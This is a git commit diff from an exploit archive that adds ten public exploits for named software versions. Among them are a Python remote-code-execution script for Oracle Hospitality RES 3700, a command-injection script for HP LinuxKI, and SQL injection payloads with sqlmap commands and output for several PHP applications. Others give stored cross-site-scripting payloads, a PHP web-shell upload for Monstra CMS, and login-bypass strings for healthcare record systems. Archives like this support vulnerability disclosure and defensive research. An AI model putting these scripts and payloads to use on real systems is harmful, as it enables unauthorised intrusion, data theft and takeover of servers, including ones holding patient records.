DB: 2020-05-19
10 changes to exploits/shellcodes HP LinuxKI 6.01 - Remote Command Injection Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection Online Examination System 1.0 - 'eid' SQL Injection Oracle Hospitality RES 3700 5.7 - Remote Code Execution forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload online Chatting System 1.0 - 'id' SQL Injection Online Healthcare Patient Record Management System 1.0 - Authentication Bypass Online Healthcare management system 1.0 - Authentication Bypass
This commit is contained in:
parent
a5ffe5baef
commit
6aad755e5e
11 changed files with 516 additions and 0 deletions
22
exploits/hardware/webapps/48474.txt
Normal file
22
exploits/hardware/webapps/48474.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
|
||||
# Exploit Author: jul10l1r4 (Julio Lira)
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-05-16
|
||||
# Vendor Homepage: https://mikrotik.com
|
||||
# Software Link: https://mikrotik.com/download
|
||||
# Version: <= 1.2.3
|
||||
# Tested on: Debian 10 buster
|
||||
# CVE: 2020-13118
|
||||
Description: SQL Injection found in check_community.php:49
|
||||
|
||||
$community = $_GET['community'];
|
||||
$_SESSION['community'] = $community;
|
||||
$query = "SELECT name from router where `community`='
|
||||
$community'";
|
||||
|
||||
PoC:
|
||||
|
||||
http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI
|
||||
|
||||
SQLmap using:
|
||||
sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3
|
65
exploits/java/webapps/48477.txt
Normal file
65
exploits/java/webapps/48477.txt
Normal file
|
@ -0,0 +1,65 @@
|
|||
# Exploit Title: Oracle Hospitality RES 3700 5.7 - Remote Code Execution
|
||||
# Date: 2019-10-01
|
||||
# Exploit Author: Walid Faour
|
||||
# Vendor Homepage: https://www.oracle.com/industries/food-beverage/products/res-3700/
|
||||
# Software Link: N/A (Available to customers)
|
||||
# Version: <= v5.7
|
||||
# Tested on: Windows Server 2003 / Windows Server 2008
|
||||
# CVE : CVE-2019-3025
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
#Author: Walid Faour
|
||||
#Date: Aug. 2, 2019
|
||||
#Oracle Hospitality RES 3700 Release 4.9 Exploit
|
||||
|
||||
import binascii
|
||||
import requests
|
||||
|
||||
print
|
||||
print '-------------------------------------------------'
|
||||
print 'Oracle Hospitality RES 3700 Release 4.9 - Exploit'
|
||||
print '-------------------------------------------------'
|
||||
print
|
||||
|
||||
IP = raw_input("Enter the IP address: ")
|
||||
URL = "http://" + IP + ":50123"
|
||||
|
||||
f = open("attacker-4.9.exe",'rb')
|
||||
raw_payload = f.read()
|
||||
payload_hex = binascii.hexlify(raw_payload)
|
||||
f.close()
|
||||
|
||||
g = open("attacker-4.9.job",'rb')
|
||||
raw_task = g.read()
|
||||
scheduled_task_hex = binascii.hexlify(raw_task)
|
||||
g.close()
|
||||
|
||||
def exploit_body(data,full_path):
|
||||
body = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> \
|
||||
<SOAP-ENV:Body xmlns:MCRS-ENV="MCRS-URI"> \
|
||||
<MCRS-ENV:Service>MDSSYSUTILS</MCRS-ENV:Service> \
|
||||
<MCRS-ENV:Method>TransferFile</MCRS-ENV:Method> \
|
||||
<MCRS-ENV:SessionKey>Session</MCRS-ENV:SessionKey> \
|
||||
<MCRS-ENV:InputParameters> \
|
||||
<dst>' + full_path + '</dst> \
|
||||
<fn>' + full_path + '</fn> \
|
||||
<data>' + data + '</data> \
|
||||
</MCRS-ENV:InputParameters> \
|
||||
</SOAP-ENV:Body> \
|
||||
</SOAP-ENV:Envelope>'
|
||||
return body
|
||||
def exploit_headers(body):
|
||||
headers = {
|
||||
"Content-Type" : "text/xml",
|
||||
"User-Agent" : "MDS POS Client",
|
||||
"Host" : IP + ":50123",
|
||||
"Content-Length" : str(len(body)),
|
||||
"Connection" : "Keep-Alive"
|
||||
}
|
||||
return headers
|
||||
print 'Exploiting Oracle Hospitality RES 3700 at IP address ' + IP + '...'
|
||||
body_payload = exploit_body(payload_hex,"C:\\Windows\\System32\\attacker-4.9.exe")
|
||||
body_task = exploit_body(scheduled_task_hex,"C:\\Windows\\Tasks\\attacker-4.9.job")
|
||||
send_payload = requests.post(URL,data=body_payload,headers=exploit_headers(body_payload))
|
||||
send_task = requests.post(URL,data=body_task,headers=exploit_headers(body_task))
|
40
exploits/multiple/remote/48483.txt
Normal file
40
exploits/multiple/remote/48483.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
Exploit Title: HP LinuxKI 6.01 - Remote Command Injection
|
||||
Date: 2020-05-17
|
||||
Exploit Author: Cody Winkler
|
||||
Vendor Homepage: https://www.hpe.com/us/en/home.html
|
||||
Software Link: https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-1
|
||||
Version: <= v6.0-1
|
||||
Tested on: LinuxKI Docker Image
|
||||
CVE: CVE-2020-7209
|
||||
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import requests
|
||||
import argparse
|
||||
import sys
|
||||
import re
|
||||
|
||||
def parse_options():
|
||||
|
||||
formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=50)
|
||||
parser = argparse.ArgumentParser(description='HP LinuxKI <= 6.0-1 RCE - CVE-2020-7209', formatter_class=formatter)
|
||||
parser.add_argument("-i", "--ip", dest='host', type=str, help="Target Hostname/IP", required=True)
|
||||
parser.add_argument("-p", "--port", dest='port', type=str, help="Target Port", required=True)
|
||||
parser.add_argument("-c", "--cmd", dest='cmd', type=str, help="Command to execute", required=True)
|
||||
args = parser.parse_args()
|
||||
return args
|
||||
|
||||
def main(args):
|
||||
|
||||
host = args.host
|
||||
port = args.port
|
||||
cmd = args.cmd
|
||||
path = '/linuxki/experimental/vis/kivis.php?type=kitrace&pid=15;echo BEGIN;%s;echo END;' % cmd
|
||||
rce = requests.get('http://' + host + ':' + port + path, verify=False)
|
||||
output = rce.text
|
||||
a, b = output.find('BEGIN'), output.find('END')
|
||||
print(output[a+6:b])
|
||||
|
||||
if __name__ in "__main__":
|
||||
args = parse_options()
|
||||
main(args)
|
91
exploits/php/webapps/48475.txt
Normal file
91
exploits/php/webapps/48475.txt
Normal file
|
@ -0,0 +1,91 @@
|
|||
# Exploit Title: Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
|
||||
# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-05-18
|
||||
# Vendor Homepage: https://connekthq.com/plugins/ajax-load-more/
|
||||
# Software Link: https://vi.wordpress.org/plugins/ajax-load-more/
|
||||
# Version: <= 5.3.1
|
||||
# Tested on: Ubuntu 18.04
|
||||
|
||||
Description:
|
||||
A blind SQL injection vulnerability is present in Ajax load more.
|
||||
$wpdb->get_var("SELECT repeaterDefault FROM " . $table_name . " WHERE name
|
||||
= '$n'");
|
||||
|
||||
POC:
|
||||
|
||||
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: lab-pwn.com
|
||||
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
|
||||
Firefox/76.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer:
|
||||
http://lab-pwn.com/wordpress/wp-admin/admin.php?page=ajax-load-more-repeaters
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 597
|
||||
Origin: http://lab-pwn.com
|
||||
Connection: close
|
||||
Cookie:
|
||||
wordpress_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cab29a771b72eed2d65f02d50fd24ea85ae85f38d0fcc41abb56797fb8c7590a3;
|
||||
wordpress_logged_in_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cb14c3363c0174d9eb93e2d2bbdd3627b293ea3e8fa8a1080325f62bb462938e2;
|
||||
wp-settings-time-1=1589773793; PHPSESSID=0lsvlo9il6ibjiuflljl3qcub1
|
||||
|
||||
action=alm_update_repeater&value=%3Cli+%3C%3Fphp+if+(!has_post_thumbnail())+%7B+%3F%3E+class%3D%22no-img%22%3C%3Fphp+%7D+%3F%3E%3E%0A+++%3C%3Fphp+if+(+has_post_thumbnail()+)+%7B+the_post_thumbnail('alm-thumbnail')%3B+%7D%3F%3E%0A+++%3Ch3%3E%3Ca+href%3D%22%3C%3Fphp+the_permalink()%3B+%3F%3E%22+title%3D%22%3C%3Fphp+the_title()%3B+%3F%3E%22%3E%3C%3Fphp+the_title()%3B+%3F%3E%3C%2Fa%3E%3C%2Fh3%3E%0A+++%3Cp+class%3D%22entry-meta%22%3E%3C%3Fphp+the_time(%22F+d%2C+Y%22)%3B+%3F%3E%3C%2Fp%3E%0A+++%3C%3Fphp+the_excerpt()%3B+%3F%3E%0A%3C%2Fli%3E&repeater='
|
||||
or sleep(5)#&type=test&alias=&nonce=ae68ab8c91
|
||||
|
||||
SQL map:
|
||||
custom injection marker ('*') found in option '--data'. Do you want to
|
||||
process it? [Y/n/q]
|
||||
[12:43:16] [INFO] resuming back-end DBMS 'mysql'
|
||||
[12:43:16] [INFO] testing connection to the target URL
|
||||
sqlmap resumed the following injection point(s) from stored session:
|
||||
---
|
||||
Parameter: #1* ((custom) POST)
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause
|
||||
Payload: action=alm_update_repeater&value=<li <?php if
|
||||
(!has_post_thumbnail()) { ?> class="no-img"<?php } ?>>
|
||||
<?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail');
|
||||
}?>
|
||||
<h3><a href="<?php the_permalink(); ?>" title="<?php the_title();
|
||||
?>"><?php the_title(); ?></a></h3>
|
||||
<p class="entry-meta"><?php the_time("F d, Y"); ?></p>
|
||||
<?php the_excerpt(); ?>
|
||||
</li>&repeater=-2104' OR 5557=5557-- dHBa#&type=test&alias=&nonce=ae68ab8c91
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
|
||||
BY clause (FLOOR)
|
||||
Payload: action=alm_update_repeater&value=<li <?php if
|
||||
(!has_post_thumbnail()) { ?> class="no-img"<?php } ?>>
|
||||
<?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail');
|
||||
}?>
|
||||
<h3><a href="<?php the_permalink(); ?>" title="<?php the_title();
|
||||
?>"><?php the_title(); ?></a></h3>
|
||||
<p class="entry-meta"><?php the_time("F d, Y"); ?></p>
|
||||
<?php the_excerpt(); ?>
|
||||
</li>&repeater=' OR (SELECT 3214 FROM(SELECT
|
||||
COUNT(*),CONCAT(0x716a6b7a71,(SELECT
|
||||
(ELT(3214=3214,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM
|
||||
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
|
||||
AHqK#&type=test&alias=&nonce=ae68ab8c91
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: action=alm_update_repeater&value=<li <?php if
|
||||
(!has_post_thumbnail()) { ?> class="no-img"<?php } ?>>
|
||||
<?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail');
|
||||
}?>
|
||||
<h3><a href="<?php the_permalink(); ?>" title="<?php the_title();
|
||||
?>"><?php the_title(); ?></a></h3>
|
||||
<p class="entry-meta"><?php the_time("F d, Y"); ?></p>
|
||||
<?php the_excerpt(); ?>
|
||||
</li>&repeater=' OR SLEEP(5)-- pExJ#&type=test&alias=&nonce=ae68ab8c91
|
||||
---
|
||||
[12:43:17] [INFO] the back-end DBMS is MySQL
|
||||
web server operating system: Linux Ubuntu
|
||||
web application technology: Nginx
|
||||
back-end DBMS: MySQL >= 5.0
|
53
exploits/php/webapps/48476.txt
Normal file
53
exploits/php/webapps/48476.txt
Normal file
|
@ -0,0 +1,53 @@
|
|||
# Exploit Title: Online Examination System 1.0 - 'eid' SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-05-16
|
||||
# Exploit Author: BKpatron
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14210/online-examination-system-project-using-phpmysql.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlineexamination.zip
|
||||
# Version: v1.0
|
||||
# Tested on: Win 10
|
||||
# CVE: N/A
|
||||
|
||||
#Description:
|
||||
Online Examination System Project is vulnerable to
|
||||
SQL injection via the 'eid' parameter on the account.php page.
|
||||
# Create a new account and Move to the profile on top right side (click)
|
||||
# vulnerable file : account.php
|
||||
# vulnerable Parameter: eid
|
||||
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5
|
||||
|
||||
Parameter: eid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: q=quiz&step=2&eid=5589741f9ed52' AND 1509=1509 AND 'aIOb'='aIOb&n=1&t=5
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4105 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(4105=4105,1))),0x717a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ytnk'='Ytnk&n=1&t=5
|
||||
|
||||
Type: time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||
Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4498 FROM (SELECT(SLEEP(5)))EAAg) AND 'OoDV'='OoDV&n=1&t=5
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (NULL) - 5 columns
|
||||
Payload: q=quiz&step=2&eid=5589741f9ed52' UNION ALL SELECT NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL-- iOWr&n=1&t=5
|
||||
---
|
||||
[INFO] the back-end DBMS is MySQL
|
||||
web application technology: PHP, Apache 2.4.39, PHP 7.2.18
|
||||
back-end DBMS: MySQL >= 5.0
|
||||
# Proof of Concept:
|
||||
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=sqli&n=1&t=5
|
||||
|
||||
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5
|
||||
GET /onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5 HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=l61egdpolqmktgtuoedjqmktge
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5
|
25
exploits/php/webapps/48478.txt
Normal file
25
exploits/php/webapps/48478.txt
Normal file
|
@ -0,0 +1,25 @@
|
|||
# Exploit Title: forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting
|
||||
# Date: 2020-05-15
|
||||
# Exploit Author: Daniel Ortiz
|
||||
# Vendor Homepage: https://sourceforge.net/projects/forma/
|
||||
# Software link: https://sourceforge.net/projects/forma/files/latest/download
|
||||
# Tested on: XAMPP for Linux 64bit 5.6.40-0
|
||||
|
||||
|
||||
|
||||
## 1 -Course Module
|
||||
- Vulnerable parameter: course_code, course_name, course_box_descr, course_descr
|
||||
- Payload: <SCRIPT>alert('XSS');</SCRIPT>
|
||||
- Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered.
|
||||
- Privileges: It requires admin.
|
||||
- Location: Admin Area > E-learning > Courses > Courses > Edit Course
|
||||
- Endopoint: /formalms/appCore/index.php?r=alms/course/modcourse
|
||||
|
||||
|
||||
## 1 -Profile Module
|
||||
- Vulnerable parameter: Email
|
||||
- Payload: <div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onmouseover=alert('xss') )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
|
||||
- Details: There is some control on this field but can bypassed.
|
||||
- Privileges: Do not requires admin or student account.
|
||||
- Location: My Profile > Edit > Put the payload in Email field.
|
||||
- Endpoint: /formalms/appLms/index.php?r=lms/profile/show&ap=saveinfo
|
58
exploits/php/webapps/48479.txt
Normal file
58
exploits/php/webapps/48479.txt
Normal file
|
@ -0,0 +1,58 @@
|
|||
# Exploit Title: Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-05-18
|
||||
# Exploit Author: Kishan Lal Choudhary
|
||||
# Vendor Homepage: https://monstra.org
|
||||
# Software Link: https://bitbucket.org/awilum/monstra/downloads/monstra-3.0.4.zip
|
||||
# Version: 3.0.4
|
||||
# Tested on: Ubuntu
|
||||
|
||||
|
||||
|
||||
1. Goto: http://192.168.2.5/monstra/admin/index.php?id=filesmanager&path=uploads/
|
||||
|
||||
2. Upload a one liner shell with php7 extenstion ie: shell.php7
|
||||
|
||||
#burp request
|
||||
------------------------------------EOF-----------------------------------------------------
|
||||
POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
|
||||
Host: 192.168.2.5
|
||||
Content-Length: 548
|
||||
Cache-Control: max-age=0
|
||||
Origin: http://192.168.2.5
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://192.168.2.5/monstra/admin/index.php?id=filesmanager
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
|
||||
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
|
||||
Connection: close
|
||||
|
||||
------WebKitFormBoundarytRfyCkYq8NvztDBf
|
||||
Content-Disposition: form-data; name="csrf"
|
||||
|
||||
2e6ae2353998caa319aae262b113c6b3f17a9636
|
||||
------WebKitFormBoundarytRfyCkYq8NvztDBf
|
||||
Content-Disposition: form-data; name="file"; filename="shell.php7"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
|
||||
|
||||
|
||||
------WebKitFormBoundarytRfyCkYq8NvztDBf
|
||||
Content-Disposition: form-data; name="upload_file"
|
||||
|
||||
Upload
|
||||
------WebKitFormBoundarytRfyCkYq8NvztDBf--
|
||||
|
||||
------------------------------------EOF-----------------------------------------------------
|
||||
|
||||
|
||||
3. trigger your shell by visiting http://192.168.2.5/monstra/public/uploads/shell.php7?cmd=id
|
||||
|
||||
|
||||
|
||||
|
||||
We have successfully got Remote Code execution
|
47
exploits/php/webapps/48480.txt
Normal file
47
exploits/php/webapps/48480.txt
Normal file
|
@ -0,0 +1,47 @@
|
|||
# Exploit Title: online Chatting System 1.0 - 'id' SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-05-17
|
||||
# Exploit Author: BKpatron
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14224/online-chatting-system-using-phpmysql.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinechatting.zip
|
||||
# Version: v1.0
|
||||
# Tested on: Win 10
|
||||
# CVE: N/A
|
||||
# my website: bkpatron.com
|
||||
|
||||
# Discription:
|
||||
The online Chatting System v1.0 application is vulnerable to SQL injection via the 'id' parameter on the chatroom.php page.
|
||||
# vulnerable file : chatroom.php
|
||||
http://localhost/chat_system/user/chatroom.php?id=5
|
||||
|
||||
Parameter: id (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: id=5' AND 2674=2674 AND 'NdtA'='NdtA
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: id=5' AND (SELECT 8144 FROM(SELECT COUNT(*),CONCAT(0x7171717a71,(SELECT (ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIwS'='OIwS
|
||||
|
||||
Type: time-based blind
|
||||
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
|
||||
Payload: id=5' AND 4648=BENCHMARK(5000000,MD5(0x67644874)) AND 'oSJd'='oSJd
|
||||
---
|
||||
[INFO] the back-end DBMS is MySQL
|
||||
web application technology: Apache 2.4.39, PHP 7.2.18
|
||||
back-end DBMS: MySQL >= 5.0
|
||||
# Proof of Concept:
|
||||
http://localhost/chat_system/user/chatroom.php?id=5
|
||||
|
||||
GET /chat_system/user/chatroom.php?id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mstb1630gvh0f97me7qdh5f7ke
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Cache-Control: max-age=0
|
||||
|
||||
id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS
|
64
exploits/php/webapps/48481.txt
Normal file
64
exploits/php/webapps/48481.txt
Normal file
|
@ -0,0 +1,64 @@
|
|||
# Exploit Title: Online Healthcare Patient Record Management System 1.0 - Authentication Bypass
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-05-18
|
||||
# Exploit Author: Daniel Monzón (stark0de)
|
||||
# Vendor Homepage: https://www.sourcecodester.com
|
||||
# Software Link: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html
|
||||
# Version: N/A
|
||||
# Tested on: Kali Linux 2020.2 x64
|
||||
# CVE : N/A
|
||||
|
||||
|
||||
The Online Healthcare Patient Record Management System suffers from multiple authentication bypass vulnerabilities:
|
||||
|
||||
The login.php file allows a user to just supply ‘ or 1=1 – as a username and whatever password and bypass the authentication
|
||||
|
||||
<?php
|
||||
session_start();
|
||||
if(ISSET($_POST['login'])){
|
||||
$username = $_POST['username'];
|
||||
$password = $_POST['password'];
|
||||
$conn = new mysqli("localhost", "root", "", "hcpms") or die(mysqli_error());
|
||||
$query = $conn->query("SELECT * FROM `user` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error());
|
||||
|
||||
The same happens with login.php for the admin area:
|
||||
|
||||
<?php
|
||||
session_start();
|
||||
$username = $_POST['username'];
|
||||
$password = $_POST['password'];
|
||||
if(ISSET($_POST['login'])){
|
||||
$conn = new mysqli("localhost", "root", "", "hcpms") or die(mysqli_error());
|
||||
$query = $conn->query("SELECT *FROM `admin` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error());
|
||||
$fetch = $query->fetch_array();
|
||||
$valid = $query->num_rows;
|
||||
if($valid > 0){
|
||||
$_SESSION['admin_id'] = $fetch['admin_id'];
|
||||
header("location:home.php");
|
||||
|
||||
|
||||
|
||||
There is also an authentication bypass issue located in add_user.php:
|
||||
|
||||
<?php
|
||||
if(ISSET($_POST['save_user'])){
|
||||
$username = $_POST['username'];
|
||||
$password = $_POST['password'];
|
||||
$firstname = $_POST['firstname'];
|
||||
$middlename = $_POST['middlename'];
|
||||
$lastname = $_POST['lastname'];
|
||||
$section = $_POST['section'];
|
||||
$conn = new mysqli("localhost", "root", "", "hcpms");
|
||||
$q1 = $conn->query("SELECT * FROM `user` WHERE `username` = '$username'") or die(mysqli_error());
|
||||
$f1 = $q1->fetch_array();
|
||||
$c1 = $q1->num_rows;
|
||||
if($c1 > 0){
|
||||
echo "<script>alert('Username already taken')</script>";
|
||||
}else{
|
||||
$conn->query("INSERT INTO `user` VALUES('', '$username', '$password', '$firstname', '$middlename', '$lastname', '$section')");
|
||||
header("location: user.php");
|
||||
}
|
||||
}
|
||||
If a request is made with the required parameters, any user can create an admin account (no authentication is required to do this).
|
||||
|
||||
Finally, there are many SQL injection vulnerabilities (GET parameters directly passed to SQL queries), but those are authenticated
|
41
exploits/php/webapps/48482.txt
Normal file
41
exploits/php/webapps/48482.txt
Normal file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: Online Healthcare management system 1.0 - Authentication Bypass
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-05-16
|
||||
# Exploit Author: BKpatron
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinehealthcare.zip
|
||||
# Version: v1.0
|
||||
# Tested on: Win 10
|
||||
# CVE: N/A
|
||||
# my website: bkpatron.com
|
||||
|
||||
# Vulnerability: Attacker can bypass login page and access to dashboard page
|
||||
# vulnerable file : admin/index.php || admin/login.php
|
||||
# Parameter & Payload: '=''or'
|
||||
# Proof of Concept:
|
||||
http://localhost/onlinehealthcare/admin/login.php
|
||||
|
||||
POST /onlinehealthcare/admin/login.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data; boundary=---------------------------293261110021842
|
||||
Content-Length: 356
|
||||
Referer: http://localhost/onlinehealthcare/admin/index.php
|
||||
Cookie: _ga=GA1.1.1353584531.1478253768
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
-----------------------------293261110021842: undefined
|
||||
Content-Disposition: form-data; name="username"
|
||||
'=''or'
|
||||
-----------------------------293261110021842
|
||||
Content-Disposition: form-data; name="password"
|
||||
|
||||
'=''or'
|
||||
-----------------------------293261110021842
|
||||
Content-Disposition: form-data; name="login"
|
||||
|
||||
|
||||
-----------------------------293261110021842--
|
|
@ -18147,6 +18147,7 @@ id,file,description,date,author,type,platform,port
|
|||
48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
|
||||
48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
|
||||
48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple,
|
||||
48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
